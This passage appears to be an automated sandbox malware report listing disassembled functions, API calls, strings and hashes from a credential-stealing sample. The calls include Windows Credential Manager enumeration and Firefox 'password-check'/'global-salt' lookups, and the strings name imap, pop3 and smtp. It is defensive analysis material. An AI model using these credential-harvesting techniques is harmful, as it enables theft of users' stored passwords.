                                                                                                                                                                                                                                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                                                                                                      Function 00444059 Relevance: 9.1, APIs: 6, Instructions: 96stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 577244452-0
                                                                                                                                                                                                                                      • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                                                                                                      Function 00404487 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$memcpystrlen
                                                                                                                                                                                                                                      • String ID: imap$pop3$smtp
                                                                                                                                                                                                                                      • API String ID: 2025310588-821077329
                                                                                                                                                                                                                                      • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                                                                                                      Function 0040C00D Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 72COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,762D0A60), ref: 00408EBE
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,762D0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                                                                                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                                                                                                      Function 00403A61 Relevance: 9.1, APIs: 6, Instructions: 57filestringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403A88
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403AA1
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403AE9
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1786725549-0
                                                                                                                                                                                                                                      • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                      • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                                                                                                                                      Function 0040C143 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2014771361-0
                                                                                                                                                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                                                                                                      Function 0040613B Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcmp$memcpy
                                                                                                                                                                                                                                      • String ID: global-salt$password-check
                                                                                                                                                                                                                                      • API String ID: 231171946-3927197501
                                                                                                                                                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                                                                                                      Function 00443473 Relevance: 9.0, APIs: 6, Instructions: 46COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                                                                                                      Function 00401694 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                                                                                                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 19018683-0
                                                                                                                                                                                                                                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                                                                                                      Function 004063B2 Relevance: 8.9, APIs: 7, Instructions: 157COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 438689982-0
                                                                                                                                                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                                                                                                      Function 0044493E Relevance: 8.9, APIs: 7, Instructions: 147stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                                                                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset$strlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2142929671-0
                                                                                                                                                                                                                                      • Opcode ID: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 222256a1374bd43cf022861c561c1c3192c4ec1bcf54050736f6a4219f509775
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                                                                                                                                                      Function 0040F6E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 97stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
